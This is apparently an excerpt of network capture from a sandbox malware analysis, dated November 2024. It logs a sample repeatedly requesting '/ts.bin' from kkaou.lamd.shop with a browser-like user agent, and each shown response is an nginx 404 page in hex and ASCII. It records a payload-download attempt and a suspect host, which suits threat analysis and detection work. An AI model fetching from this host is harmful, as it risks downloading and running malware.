                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:55.114489079 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:55.500614882 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:41 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:55.613898993 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:56.000164986 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:41 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:56.113863945 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:56.499811888 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:42 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:56.613967896 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:56.999691010 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:42 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:57.114692926 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:57.500417948 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:43 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:57.660921097 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:58.046920061 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:43 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:58.160640955 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:58.546711922 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:44 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:58.668988943 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:59.054755926 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:44 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:59.160792112 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:59.546694994 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:45 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:59.868947029 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:00.254656076 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:45 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:11:00.552362919 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:00.938164949 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:46 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:01.056272030 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:01.442178965 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:46 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:01.551331997 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:01.937150955 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:47 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:02.051367998 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:02.438497066 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:47 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
